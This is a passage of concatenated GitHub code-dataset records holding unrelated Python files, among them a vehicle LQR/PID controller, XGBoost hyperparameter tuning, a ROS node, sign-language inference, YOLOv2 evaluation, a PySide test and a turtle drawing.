Design your controllers in the spaces below. \n # Remember, your controllers will need to use the states\n # to calculate control inputs (F, delta). \n\n # ---------------|Lateral Controller|-------------------------\n A = np.array([[0, 1, 0, 0], [0, -4*Ca / (m * xdot), 4*Ca/m, (-2*Ca*(lf - lr))/(m*xdot)], [0, 0, 0, 1], [0, (-2*Ca*(lf - lr)) / (Iz * xdot), (2*Ca*(lf - lr)) / Iz, (-2*Ca*(np.power(lf, 2) + np.power(lr, 2))) / (Iz * xdot)]])\n B = np.array([[0], [2*Ca / m], [0], [(2 * Ca* lf) / Iz]])\n C = np.identity(4)\n D = np.array([[0],[0],[0],[0]])\n CT = signal.StateSpace(A,B,C,D)\n DT = CT.to_discrete(delT)\n A = DT.A\n B = DT.B\n \n \n haha = (Y-Y_curv)*np.cos(psi_curv)-(X-X_curv)*np.sin(psi_curv)\n #print(self.curve[ind + jia])\n e1 = (Y-Y_desired)*np.cos(psi_desired)-(X-X_desired)*np.sin(psi_desired)\n e2 = wrapToPi(psi - psi_desired)\n \n e1d = xdot * e2 + ydot\n psidot_desired = xdot*self.curve[ind + jia]\n e2d = psidot - psidot_desired\n if(abs(e2)>0.11):\n Vx = 5\n else:\n Vx = 18\n \n \n \n \n Q = np.eye(4)\n R = 1\n \n\n S = linalg.solve_discrete_are(A, B, Q, R)\n K= -np.linalg.inv(B.T@S@B+R)@B.T@S@A\n \n \n \n self.error_dis = e1\n \n\n e = np.array([e1,e1d,e2,e2d])\n delta = float(K @ e)\n \n \n \n\n # ---------------|Longitudinal Controller|-------------------------\n error_kp = Vx - xdot\n \n \n self.error_ki += error_kp * delT \n \n \n error_kd = (error_kp - self.previous_error_kp)/delT\n self.previous_error_kp = error_kp\n \n \n F = kp * error_kp + ki * self.error_ki + kd * error_kd\n\n # Return all states and calculated control inputs (F, delta)\n \n \n return X, Y, xdot, ydot, psi, psidot, F, delta\n","repo_name":"HuaiqianShou/24-677-Linear-Control-Systems","sub_path":"Project3/Code/controllers/main/your_controller.py","file_name":"your_controller.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"72564048956","text":"\"\"\"\nGiven two sorted arrays nums1 and nums2 of size m and n respectively, return the median of the two sorted arrays.\n\nFollow up: The overall run time complexity should be O(log (m+n)).\n\n\n\nExample 1:\n\nInput: nums1 = [1,3], nums2 = [2]\nOutput: 2.00000\nExplanation: merged array = [1,2,3] and median is 2.\nExample 2:\n\nInput: nums1 = [1,2], nums2 = [3,4]\nOutput: 2.50000\nExplanation: merged array = [1,2,3,4] and median is (2 + 3) / 2 = 2.5.\nExample 3:\n\nInput: nums1 = [0,0], nums2 = [0,0]\nOutput: 0.00000\nExample 4:\n\nInput: nums1 = [], nums2 = [1]\nOutput: 1.00000\nExample 5:\n\nInput: nums1 = [2], nums2 = []\nOutput: 2.00000\n\n\nConstraints:\n\nnums1.length == m\nnums2.length == n\n0 <= m <= 1000\n0 <= n <= 1000\n1 <= m + n <= 2000\n-106 <= nums1[i], nums2[i] <= 106\n\"\"\"\n\n\"\"\"\n更短的列表至少会拿出大约二分之一的来和长列表PK\n\"\"\"\n\n\nclass Solution(object):\n def findMedianSortedArrays(self, nums1, nums2):\n \"\"\"\n :param nums1:\n :param nums2:\n :return:\n \"\"\"\n l = len(nums1) + len(nums2)\n if l % 2 == 1:\n return self.findKth(nums1, nums2, l // 2)\n else:\n return (self.findKth(nums1, nums2, l // 2 - 1) + self.findKth(nums1, nums2, l // 2)) / 2.0\n\n def findKth(self, A, B, k):\n if len(A) > len(B):\n A, B = B, A\n if not A:\n return B[k]\n if k == len(A) + len(B) - 1:\n return max(A[-1], B[-1])\n i = len(A) // 2\n j = k - i\n if A[i] > B[j]:\n return self.findKth(A[:i], B[j:], i)\n else:\n return self.findKth(A[i:], B[:j], 
j)\n","repo_name":"yqxd/python_hards","sub_path":"0004MedianofTwoSortedArrays.py","file_name":"0004MedianofTwoSortedArrays.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"15508081198","text":"#coding=utf-8\n\"\"\"\n基于xgboost的cv函数进行调参\n\"\"\"\nimport xgboost as xgb\nfrom sklearn.model_selection import train_test_split,GridSearchCV\nfrom sklearn.metrics import precision_score,recall_score\nimport pprint\nimport pandas as pd\nimport time\nimport numpy as np\nimport ConfigParser\nimport argparse\nimport os\n\nfrom tools import get_csr_labels,save2xgdata\n\n# parser\ndef arg_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument('-c','--conf', required=True)\n parser.add_argument('-o', '--output', required=True)\n return parser.parse_args()\n\n# configure parser\ndef conf_parser(conf_path):\n cf = ConfigParser.ConfigParser()\n cf.read(conf_path)\n\n booster = cf.get('xg_conf', 'booster')\n silent = int(cf.get('xg_conf','silent'))\n nthread = int(cf.get('xg_conf', 'nthread'))\n\n eta = float(cf.get('xg_conf', 'eta'))\n gamma = float(cf.get('xg_conf', 'gamma'))\n max_delta_step = float(cf.get('xg_conf','max_delta_step'))\n p_lambda = float(cf.get('xg_conf', 'lambda'))\n alpha = float(cf.get('xg_conf', 'alpha'))\n sketch_eps = float(cf.get('xg_conf', 'sketch_eps'))\n refresh_leaf = int(cf.get('xg_conf', 'refresh_leaf'))\n max_depth = int(cf.get('xg_conf', 'max_depth'))\n subsample = float(cf.get('xg_conf', 'subsample'))\n min_child_weight = float(cf.get('xg_conf', 'min_child_weight'))\n colsample_bytree = float(cf.get('xg_conf', 'colsample_bytree'))\n\n objective = cf.get('xg_conf', 'objective')\n base_score = float(cf.get('xg_conf', 'base_score'))\n eval_metric = cf.get('xg_conf', 'eval_metric')\n ascend = int(cf.get('xg_conf','ascend'))\n seed = int(cf.get('xg_conf', 'seed'))\n\n\n save_period = int(cf.get('xg_conf', 'save_period'))\n eval = int(cf.get('xg_conf', 'eval'))\n cv = int(cf.get('xg_conf','cv'))\n\n t_num_round = int(cf.get('xg_tune','num_round'))\n t_max_depth = [int(i) for i in cf.get('xg_tune','max_depth').split(',')]\n t_subsample = [float(i) for i in cf.get('xg_tune','subsample').split(',')]\n t_min_child_weight = [float(i) for i in cf.get('xg_tune','min_child_weight').split(',')]\n t_colsample_bytree = [float(i) for i in cf.get('xg_tune','colsample_bytree').split(',')]\n\n t_param = {'num_round':t_num_round,'max_depth':t_max_depth,'subsample':t_subsample,\n 'min_child_weight':t_min_child_weight,'colsample_bytree':t_colsample_bytree}\n\n params = {'booster': booster, 'objective': objective, 'silent': silent, 'eta': eta, 'gamma': gamma,\n 'max_delta_step':max_delta_step,'lambda':p_lambda,'alpha':alpha,'sketch_eps':sketch_eps,\n 'refresh_leaf':refresh_leaf,'base_score':base_score,'max_depth':max_depth,'subsample':subsample,\n 'min_child_weight':min_child_weight,'colsample_bytree':colsample_bytree,\n # 'eval_metric':eval_metric,\n 'seed':seed,'nthread': nthread}\n\n others = {'num_round':t_num_round,'cv':cv,'ascend':ascend,'eval_metric':eval_metric}\n data = cf.get('xg_conf', 'data')\n\n if int(cf.get('xg_conf','xgmat'))==0: # if it is not a xgmat file, than convert it\n try:\n label = cf.get('xg_conf', 'label')\n save2xgdata(data, label)\n data += '.libsvm'\n except:\n pass\n else:\n data = cf.get('xg_conf', 'xgdata')\n return data, params,t_param,others\n\ndef get_negative_positive_ratio(y):\n labels_np = np.array(y)\n neg_num = np.sum(labels_np==0)\n pos_num = 
np.sum(labels_np==1)\n return neg_num/pos_num\n\ndef tune_num_boost_round(params,dtrain,num_boost_round,watchlist,eval_metric,feval=None,ascend=True):\n\n evals_result = {}\n if(feval==None):\n params['eval_metric'] = eval_metric\n xgb.train(params=params,dtrain=dtrain,num_boost_round=num_boost_round,evals=watchlist,feval=feval,evals_result=evals_result)\n evals_result = evals_result['eval'][eval_metric]\n if(ascend==True):\n loc = max(enumerate(evals_result), key=lambda x: x[1])[0]\n else:\n loc = min(enumerate(evals_result), key=lambda x: x[1])[0]\n loc += 1\n print('**** num_boost_round : %s : %s'%(loc,evals_result[loc-1]))\n return loc\n\ndef custom_eval_metirc_precison(preds,dtrain):\n labels = dtrain.get_label()\n flag1 = np.prod(preds<=1.0)\n flag2 = np.prod(preds>=0.0)\n flag = flag1*flag2\n assert flag == 1,\"预测出来的值不是概率\"\n preds = preds>=0.5\n preds = preds.astype(int)\n precison = precision_score(labels,preds)\n return 'precision',precison\n\ndef custom_eval_metirc_recall(preds,dtrain):\n labels = dtrain.get_label()\n flag1 = np.prod(preds<=1.0)\n flag2 = np.prod(preds>=0.0)\n flag = flag1*flag2\n assert flag == 1,\"预测出来的值不是概率\"\n preds = preds>=0.5\n preds = preds.astype(int)\n recall = recall_score(labels,preds)\n return 'recall',recall\n\ndef set_custom_eval_metirc(eval_metirc):\n\n custom_fs = dict(precision=custom_eval_metirc_precison,\n recall=custom_eval_metirc_recall)\n for k,v in custom_fs.items():\n if(eval_metirc==k):\n return v\n return None\nif __name__ == '__main__':\n arg = arg_parser()\n xgdata,params,params_t,params_other = conf_parser(arg.conf)\n\n x, y = get_csr_labels(xgdata)\n x_train, x_val, y_train, y_val = train_test_split(x, y, test_size=0.3, random_state=42)\n dtrain = xgb.DMatrix(x_train, label=y_train)\n dval = xgb.DMatrix(x_val, y_val)\n dtrain_whole = xgb.DMatrix(xgdata)\n watchlist = [(dtrain, 'train'), (dval, 'eval')]\n watchlist_whole = [(dtrain_whole, 'eval')]\n\n scale_pos_weight = get_negative_positive_ratio(y)\n params['scale_pos_weight'] = scale_pos_weight\n custom_feval = set_custom_eval_metirc(params_other['eval_metric'])\n # tune the parameter num_round\n num_round = tune_num_boost_round(params,dtrain,params_other['num_round'],watchlist,eval_metric=params_other['eval_metric'],feval=custom_feval,ascend=params_other['ascend'])\n\n params_t = [dict(max_depth=params_t['max_depth']),\n dict(subsample=params_t['subsample']),\n dict(min_child_weight=params_t['min_child_weight']),\n dict(colsample_bytree=params_t['colsample_bytree'])]\n for param_t in params_t:\n k = param_t.keys()[0]\n values = param_t[k]\n if(k=='num_round'):\n continue\n # pprint.pprint(params)\n print('========== ',k,' ========== ',values)\n result = []\n if(len(values) == 1):\n params[k] = values[0]\n continue\n for v in values:\n print('**** for : %s ****\\n'%(str(v)))\n params[k] = v\n if (custom_feval == None):\n params['eval_metric'] = params_other['eval_metric']\n result_df = xgb.cv(params=params,\n dtrain=dtrain_whole,\n num_boost_round=num_round,\n nfold=params_other['cv'],\n # metrics=params_other['eval_metric'],\n feval=custom_feval,\n verbose_eval=False,\n show_stdv=False,\n shuffle=True)\n result_df = result_df[['test-'+params_other['eval_metric']+'-mean']]\n # print(result_df)\n assert result_df.columns[0]=='test-'+params_other['eval_metric']+'-mean','choose the correct column\\n'\n result_np = result_df.as_matrix()\n result.append(float(result_np[-1][0]))\n print(zip(values,result))\n if(params_other['ascend'] == 1):\n loc = max(enumerate(result),key=lambda 
x:x[1])[0]\n else:\n loc = min(enumerate(result),key=lambda x:x[1])[0]\n params[k] = values[loc]\n print('%s : %s\\n'%(k,params[k]))\n num_round = tune_num_boost_round(params,dtrain_whole,params_other['num_round'],watchlist_whole,eval_metric=params_other['eval_metric'],feval=custom_feval,ascend=params_other['ascend'])\n model = xgb.train(params,dtrain_whole,num_round,watchlist_whole,feval=custom_feval)\n pprint.pprint(params)\n time_str = time.strftime(\"%Y_%m_%d_%H_%M_%S\", time.localtime())\n model.save_model(arg.output + '/' + time_str + '.xgmodel')\n print('saved : %s' % (arg.output + '/' + time_str + '.xgmodel'))\n","repo_name":"AlexYoung757/trend_ml_toolkit_xgboost","sub_path":"xg_train_cv.py","file_name":"xg_train_cv.py","file_ext":"py","file_size_in_byte":8307,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"96"} +{"seq_id":"74436606075","text":"#!/usr/bin/env python\n# coding:utf-8\n'''sydw ROS Node'''\n# license removed for brevity\n# 生源定位,灵犀灵犀唤醒词\nimport rospy\nimport os\nimport sys\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import Twist\nfrom std_msgs.msg import Float32\nfrom std_msgs.msg import Int16\nimport math\nimport time\nimport thread\n\nimport logging\nlogging.basicConfig()\n\ncnt = 0\nwakeupcount = 0\nclass sydw:\n def __init__(self, script_path):\n rospy.init_node(\"sydw\")\n self.pub=rospy.Publisher('/cmd_vel',Twist,queue_size=10)\n self.pub2 = rospy.Publisher('/xfwakeup',String,queue_size=10)\n self.sub=rospy.Subscriber('/Shengyuan',Int16,self.abs)\n self.angle = 0\n self.lock = False\n self.location = 0\n self.start = True\n def abs(self,data):\n global wakeupcount\n if(wakeupcount < 5): #第一阶段\n msg1 = String()\n msg1.data = \"ok\"\n rospy.loginfo(\"speak out\")\n self.pub2.publish(msg1)\n wakeupcount += 1\n else: #第二阶段\n thread.start_new_thread(self.adjust,(data,))\n print(wakeupcount)\n #rospy.loginfo(float(data.data))\n def adjust(self,data):\n #rospy.loginfo(\"get\")\n #rospy.loginfo(data.data)\n vel_attitude = -1.0\n try:\n get_angle = float(data.data)\n except:\n return \n if(get_angle > 180):\n get_angle = 360 - get_angle\n vel_attitude = 1.0\n if(get_angle == self.location):\n return \n self.location = get_angle\n #rospy.loginfo(self.start)\n if(get_angle>0):\n fabs = get_angle\n else:\n fabs = -get_angle\n rate = rospy.Rate(3)\n if(self.lock == True):\n self.lock = False\n else:\n self.lock = True\n sublock = self.lock\n global cnt\n cnt += 1\n jiasu = self.start\n self.start = False\n flag = False\n while(self.lock == sublock): #angle\n msg = Twist()\n if(get_angle > self.angle):\n value = 12\n elif(get_angle < self.angle):\n value = -12\n else:\n value = 0\n #msg.angular.z=float(value)\n msg.angular.z=float(value)*(vel_attitude)\n if(jiasu == True): #kaolvjiasu\n if(self.angle < 20):\n value = 2.5*math.sqrt(self.angle)+1\n self.angle += value\n self.pub.publish(msg)\n rate.sleep()\n rospy.loginfo(self.angle)\n if(math.fabs((self.angle - fabs))<=value):\n flag = True\n msg1 = String()\n msg1.data = \"ok\"\n rospy.loginfo(\"speak out\")\n self.pub2.publish(msg1)\n break\n self.angle = 0\n self.start = flag\n \nif __name__==\"__main__\":\n try:\n sydw(sys.path[0])\n rospy.spin()\n except rospy.ROSInterruptException:\n rospy.loginfo(\"sydw class has not been constructed. 
Something is error.\")\n","repo_name":"Benxiaogu/catkin_ws","sub_path":"riddle2019/src/sydw_pub.py","file_name":"sydw_pub.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"43934551335","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 26 18:47:21 2020\n\n@author: gnumi34\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport sys\n\ntry:\n file_name = sys.argv[1]\nexcept IndexError:\n raise SystemExit(f\"usage: {sys.argv[0]} csv_file\")\n\ndata = pd.read_csv(file_name)\n\n# Number of samplepoints\nN = len(data)\nTime = data['Time (s)']\nT = Time[N-1]\nt_plt = np.linspace(0, T, N, endpoint=False)\n\nplt.title(\"Flow Rate Measurement\")\nplt.plot(t_plt, data['Flow Rate (uL/min)'], label='Measured Flow')\nplt.xlabel('Time [sec]')\nplt.ylabel('Flow Rate [uL/min]')\nplt.grid(True)\nplt.legend()\nplt.show()\n","repo_name":"gnumi34/OL-Peristaltic-Pump","sub_path":"plot/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"40011030363","text":"f = open(\"17.txt\")\ns = [int(x.strip()) for x in f]\nn = 0\nmaxs = -1\nl = len(s)\n# print(*range(l))\n# alt + shift + l - автовыравнивание\nfor i in range(l):\n for j in range(i + 1, l):\n if (s[i] - s[j]) % 60 == 0 and (s[i] % 15 == 0 or s[j] % 15 == 0):\n n += 1\n maxs = max(maxs, abs(s[i] - s[j]))\n\nprint(n, maxs)\n","repo_name":"ItZoopark/ege_preparation","sub_path":"17/решу егэ/37370.py","file_name":"37370.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"22933826197","text":"\"\"\"\nGiven a binary tree, find the lowest common ancestor\n(LCA) of two given nodes in the tree.\n\nAccording to the definition of LCA on Wikipedia:\n “The lowest common ancestor is defined between two nodes\n v and w as the lowest node in T that has both v and w as\n descendants\n (where we allow a node to be a descendant of itself).”\n\n _______3______\n / \\\n ___5__ ___1__\n / \\ / \\\n 6 _2 0 8\n / \\\n 7 4\nFor example, the lowest common ancestor (LCA) of nodes 5 and 1 is 3.\nAnother example is LCA of nodes 5 and 4 is 5,\nsince a node can be a descendant of itself according to the LCA definition.\n\"\"\"\n\n\ndef lca(root, p, q):\n \"\"\"\n :type root: TreeNode\n :type p: TreeNode\n :type q: TreeNode\n :rtype: TreeNode\n \"\"\"\n if root is None or root is p or root is q:\n return root\n left = lca(root.left, p, q)\n right = lca(root.right, p, q)\n if left is not None and right is not None:\n return root\n return left if left else right\n","repo_name":"keon/algorithms","sub_path":"algorithms/tree/lowest_common_ancestor.py","file_name":"lowest_common_ancestor.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":23106,"dataset":"github-code","pt":"96"} +{"seq_id":"70273138876","text":"import os\nfrom collections import deque\n\nimport cv2\nimport numpy as np\nimport tensorflow as tf\nimport mediapipe as mp\nfrom mediapipe.tasks import python\nfrom mediapipe.tasks.python import vision\n\nos.environ['CUDA_VISIBLE_DEVICES'] = '-' # Edge에서 이용하는 것이 목표이므로 GPU를 이용하지 않음\n\nquestion1 = ['허벅지', '무릎', '발목', '발가락', '코', '귀', '손목', '얼굴', '어깨', '팔꿈치', '손', '가슴', '등', '배', '갈비뼈', '골반', '관절', '근육',\n '기도', '뇌', '두개골', 
'맹장', '목구멍', '성대', '식도', '심장', '엉덩이', '이마', '입속', '입술', '전립선', '질', '척추', '치아', '턱',\n '피부', '혀', '눈', '다리', '머리']\nquestion2 = ['오른쪽', '앞', '왼쪽', '사이', '뒤', '가운데', '경계', '바깥', '반대', '속', '안팎', '이쪽', '전부']\nquestion3 = ['토하다', '가렵다', '괜찮다', '괴롭다', '띵하다', '목마르다', '배탈', '아프다', '약하다', '어지럽다', '조마조마하다', '차다', '힘겹다']\nquestion4 = ['아니오', '예']\nquestions = [None, question1, question2, question3, question4]\nlabel_numbers = [None, 40, 13, 13, 2]\nnull_hand = [0 for _ in range(126)]\n\nbase_options = python.BaseOptions(model_asset_path='hand_landmarker.task')\noptions = vision.HandLandmarkerOptions(base_options=base_options, num_hands=2)\ndetector = vision.HandLandmarker.create_from_options(options)\nmp_holistic = mp.solutions.holistic\nholistic = mp_holistic.Holistic(min_detection_confidence=0.5, min_tracking_confidence=0.5)\n\n\ndef infer(q_num, video):\n def classify(q_num, video):\n model = tf.keras.models.load_model('models/q' + str(q_num) + '.h5')\n video = np.array(video)\n video = video.reshape(1, 30, 1662)\n result = model.predict(video)\n return np.argmax(result)\n\n def extract_keypoints(results):\n pose = np.array([[res.x, res.y, res.z, res.visibility] for res in\n results.pose_landmarks.landmark]).flatten() if results.pose_landmarks else np.zeros(33 * 4)\n face = np.array([[res.x, res.y, res.z] for res in\n results.face_landmarks.landmark]).flatten() if results.face_landmarks else np.zeros(\n 468 * 3)\n lh = np.array([[res.x, res.y, res.z] for res in\n results.left_hand_landmarks.landmark]).flatten() if results.left_hand_landmarks else np.zeros(\n 21 * 3)\n rh = np.array([[res.x, res.y, res.z] for res in\n results.right_hand_landmarks.landmark]).flatten() if results.right_hand_landmarks else np.zeros(\n 21 * 3)\n return np.concatenate([pose, face, lh, rh])\n\n def mediapipe_detection(image, model):\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image.flags.writeable = False\n results = model.process(image)\n image.flags.writeable = False\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n return image, results\n\n video = cv2.VideoCapture(video)\n label_counts = [0 for _ in range(label_numbers[q_num])]\n sequences = deque()\n hand_exits = False\n while True:\n ret, image = video.read()\n if not ret:\n break\n image, results = mediapipe_detection(image, holistic)\n keypoints = np.array(extract_keypoints(results), dtype=\"float64\")\n if hand_exits:\n sequences.append(keypoints)\n elif np.array_equal(keypoints[1536:], null_hand):\n continue\n else:\n hand_exits = True\n sequences.append(keypoints)\n\n if len(sequences) == 30:\n temp = classify(q_num, sequences)\n label_counts[temp] += 1\n sequences.popleft()\n\n elif len(sequences) < 30:\n continue\n\n return questions[q_num][np.argmax(label_counts)]","repo_name":"subin9/Korean-Sign-Language-Recognintion-Application","sub_path":"infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"3704756625","text":"import os\nimport torch\nimport time\nfrom utils import make_pred_bbox, voc_labels_array, make_pred_bbox_for_COCO\nfrom voc_eval import voc_eval\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Rectangle\nimport argparse\n# --- for test\nfrom dataset.voc_dataset import VOC_Dataset\nfrom loss import Yolo_Loss\nfrom model import YOLO_VGG_16\n\n\ndef test(epoch, device, vis, test_loader, model, criterion, opts, eval=False):\n\n # ---------- load ----------\n print('Validation of epoch 
[{}]'.format(epoch))\n model.eval()\n check_point = torch.load(os.path.join(opts.save_path, opts.save_file_name) + '.{}.pth.tar'.format(epoch),\n map_location=device)\n state_dict = check_point['model_state_dict']\n model.load_state_dict(state_dict, strict=True)\n\n visualization = False\n\n det_img_name = list()\n det_additional = list()\n det_boxes = list()\n det_labels = list()\n det_scores = list()\n\n tic = time.time()\n with torch.no_grad():\n\n for idx, datas in enumerate(test_loader):\n '''\n + VOC dataset\n for VOC datasets, datas including follows:\n (images, boxes, labels, difficulties, img_names, additional_info)\n '''\n images = datas[0]\n boxes = datas[1]\n labels = datas[2]\n difficulties = datas[3]\n img_names = datas[4]\n additional_info = datas[5]\n\n # (images, boxes, labels, difficulties, img_names, additional_info)\n\n # ---------- cuda ----------\n images = images.to(device)\n boxes = [b.to(device) for b in boxes]\n labels = [l.to(device) for l in labels]\n\n # ---------- loss ----------\n preds = model(images)\n preds = preds.permute(0, 2, 3, 1) # B, 13, 13, 125\n\n loss, _ = criterion(preds, boxes, labels)\n # ---------- eval ----------\n if eval:\n bbox, cls, scores = make_pred_bbox(preds=preds, conf_threshold=opts.conf_thres)\n\n # coco\n det_img_name.append(img_names[0])\n det_additional.append(additional_info[0])\n\n det_boxes.append(bbox)\n det_labels.append(cls)\n det_scores.append(scores)\n # print(bbox)\n\n if visualization:\n # 0. permute\n images = images.cpu()\n images = images.squeeze(0).permute(1, 2, 0) # B, C, H, W --> H, W, C\n\n # 1. un normalization\n images *= torch.Tensor([0.229, 0.224, 0.225])\n images += torch.Tensor([0.485, 0.456, 0.406])\n\n # 2. RGB to BGR\n image_np = images.numpy()\n\n # 3. box scaling\n bbox *= 416\n\n plt.figure('result')\n plt.imshow(image_np)\n\n for i in range(len(bbox)):\n print(cls[i])\n plt.text(x=bbox[i][0],\n y=bbox[i][1],\n s=voc_labels_array[int(cls[i].item())] + str(scores[i].item()),\n fontsize=10,\n bbox=dict(facecolor='red', alpha=0.5))\n\n plt.gca().add_patch(Rectangle(xy=(bbox[i][0], bbox[i][1]),\n width=bbox[i][2] - bbox[i][0],\n height=bbox[i][3] - bbox[i][1],\n linewidth=1, edgecolor='r', facecolor='none'))\n\n plt.show()\n\n toc = time.time() - tic\n # ---------- print ----------\n # for each steps\n if idx % 1000 == 0:\n print('Epoch: [{0}]\\t'\n 'Step: [{1}/{2}]\\t'\n 'Time : {time:.4f}\\t'\n .format(epoch,\n idx, len(test_loader),\n time=toc))\n annotation_path = os.path.join(opts.data_path, \"TEST\\VOC2007\\Annotations\")\n mAP = voc_eval(annotation_path, det_img_name, det_additional, det_boxes, det_scores, det_labels)\n\n if vis is not None:\n # loss plot\n vis.line(X=torch.ones((1, 2)).cpu() * epoch, # step\n Y=torch.Tensor([loss, mAP]).unsqueeze(0).cpu(),\n win='test_loss',\n update='append',\n opts=dict(xlabel='step',\n ylabel='test',\n title='test loss',\n legend=['test Loss', 'mAP']))\n\n\nif __name__ == \"__main__\":\n\n # 1. argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--test_epoch', type=int, default=149)\n parser.add_argument('--data_path', type=str, default=\"D:\\Data\\VOC_ROOT\")\n parser.add_argument('--save_path', type=str, default='./saves')\n parser.add_argument('--save_file_name', type=str, default='yolo_v2_vgg_16')\n parser.add_argument('--conf_thres', type=float, default=0.01)\n\n from config import device\n test_opts = parser.parse_args()\n print(test_opts)\n\n epoch = test_opts.test_epoch\n\n # 2. device\n device = device\n\n # 3. 
visdom\n vis = None\n\n # 4. data set\n test_set = VOC_Dataset(root=test_opts.data_path, split='TEST')\n test_loader = torch.utils.data.DataLoader(test_set,\n batch_size=1,\n collate_fn=test_set.collate_fn,\n shuffle=False)\n # 6. network\n model = YOLO_VGG_16().to(device)\n\n # 7. loss\n criterion = Yolo_Loss(num_classes=20)\n\n test(epoch=epoch,\n device=device,\n vis=vis,\n test_loader=test_loader,\n model=model,\n criterion=criterion,\n opts=test_opts,\n eval=True)\n\n\n\n\n\n\n\n","repo_name":"csm-kr/yolo_v2_vgg16_pytorch","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6062,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"96"} +{"seq_id":"12463108847","text":"import os\nimport sys\nimport unittest\n\nfrom pathlib import Path\nsys.path.append(os.fspath(Path(__file__).resolve().parents[1]))\nfrom init_paths import init_test_paths\ninit_test_paths(True)\n\nfrom testbinding import TestView\nfrom PySide6.QtCore import QAbstractListModel, QObject, QModelIndex\n\n'''Tests model/view relationship.'''\n\nobject_name = 'test object'\n\n\nclass MyObject(QObject):\n pass\n\n\nclass ListModelKeepsReference(QAbstractListModel):\n def __init__(self, parent=None):\n QAbstractListModel.__init__(self, parent)\n self.obj = MyObject()\n self.obj.setObjectName(object_name)\n\n def rowCount(self, parent=QModelIndex()):\n return 1\n\n def data(self, index, role):\n return self.obj\n\n\nclass ListModelDoesntKeepsReference(QAbstractListModel):\n def rowCount(self, parent=QModelIndex()):\n return 1\n\n def data(self, index, role):\n obj = MyObject()\n obj.setObjectName(object_name)\n return obj\n\n\nclass ListModelThatReturnsString(QAbstractListModel):\n def rowCount(self, parent=QModelIndex()):\n return 1\n\n def data(self, index, role):\n self.obj = 'string'\n return self.obj\n\n\nclass ModelViewTest(unittest.TestCase):\n\n def testListModelDoesntKeepsReference(self):\n model = ListModelDoesntKeepsReference()\n view = TestView(model)\n obj = view.getData()\n self.assertEqual(type(obj), MyObject)\n self.assertEqual(obj.objectName(), object_name)\n obj.metaObject()\n\n def testListModelKeepsReference(self):\n model = ListModelKeepsReference()\n view = TestView(model)\n obj = view.getData()\n self.assertEqual(type(obj), MyObject)\n self.assertEqual(obj.objectName(), object_name)\n\n def testListModelThatReturnsString(self):\n model = ListModelThatReturnsString()\n view = TestView(model)\n obj = view.getData()\n self.assertEqual(type(obj), str)\n self.assertEqual(obj, 'string')\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"qtproject/pyside-pyside-setup","sub_path":"sources/pyside6/tests/pysidetest/modelview_test.py","file_name":"modelview_test.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"96"} +{"seq_id":"72821927996","text":"#!/usr/bin/env python\n# coding: utf-8\n\n'''\nTurtle starter code\nATLS 1300\nAuthor: Dr. Z\nAuthor: YOUR NAME\nMay 29, 2020\n'''\n\nfrom turtle import * #import the library of commands that you'd like to use\n\ncolormode(255)\n\n# Create a panel to draw on. \npanel = Screen()\nw = 750 # width of panel\nh = 750 # height of panel\npanel.setup(width=w, height=h) #600 x 600 is a decent size to work on. 
\n#You can experiment by making it the size of your screen or super tiny!\n\n# Create a colorful background and add Bezos image to it\nimage = \"Bezos.gif\"\npanel.bgcolor(\"lightblue\")\npanel.bgpic(image)\n\n# sqaure above left shoulder \nup()\ngoto(-250,-14)\ndown()\nspeed(20)\npensize(4)\npencolor(\"black\")\nfillcolor(230, 10, 100)\nbegin_fill()\nfor b in range(4):\n forward(50)\n left(90)\nend_fill()\n\n# star and circle at end of star\nup()\ngoto(-205, 110)\ndown()\n\npensize(5)\npencolor(\"purple\")\nfor i in range(20):\n forward(i * 10)\n right(144)\npencolor('orange')\ncircle(20)\n\n# sunglasses bridge\npencolor('black')\nup()\ngoto(0, 120)\nleft(11)\ndown()\nforward(27)\nup()\n# sunglasses ear piece \ngoto(-34, 113)\nright(195)\ndown()\nforward(54)\nup()\n# sunglasses lenses\ngoto(45, 137)\ndown()\nfillcolor('black')\nbegin_fill()\ncircle(18)\nend_fill()\nup()\ngoto(-15, 136)\ndown()\nfillcolor('black')\nbegin_fill()\ncircle(18)\nend_fill()\n\n# sun\nup()\ngoto(288, 148)\ncolor('yellow')\ndown()\nbegin_fill()\nwhile True:\n forward(200)\n left(170)\n if abs(pos()) < 1:\n break\nend_fill()\ndone()\n\n#sorry it's kind of random, I wanted to do something with a dollar sign but couldn't figure that out so I thought a sun and sunglasses were fun with some other cool designs! 